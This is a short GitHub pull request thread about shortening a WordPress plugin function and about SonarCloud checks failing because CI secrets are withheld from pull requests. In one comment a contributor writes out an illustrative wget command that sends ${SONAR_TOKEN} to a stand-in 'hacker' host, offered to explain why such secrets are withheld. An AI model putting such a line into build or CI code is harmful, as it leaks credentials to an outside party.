### PR TITLE
Make get_gravatar_checkbox shorter

### PR DESCRIPTION
**Pull request by szepeviktor**
While reading your code.
https://github.com/szepeviktor/phpstan-wordpress/issues/33

### CODE REVIEW

**Comment by szepeviktor** [comment]
Friendly ping×4 @mundschenk-at

**Comment by mundschenk-at** [comment]
I've seen it, but I'm still thinking about whether I find the more concise version more readable or not. 

More importantly, the status checks prevent me from simply merging (apparently, SonarCloud does not use the token I set when you are doing the PR?).

**Comment by szepeviktor** [comment]
> SonarCloud does not use the token I set when you are doing the PR?

Yes, secrets are not available in PR-s.
What if I `wget "http://my-hacker.site/?secret=${SONAR_TOKEN}"`

But in this special case only SonarCloud has access to that variable.

**Comment by szepeviktor** [comment]
@mundschenk-at **All** green

**Comment by szepeviktor** [comment]
Thank you.

**Pull request merged**
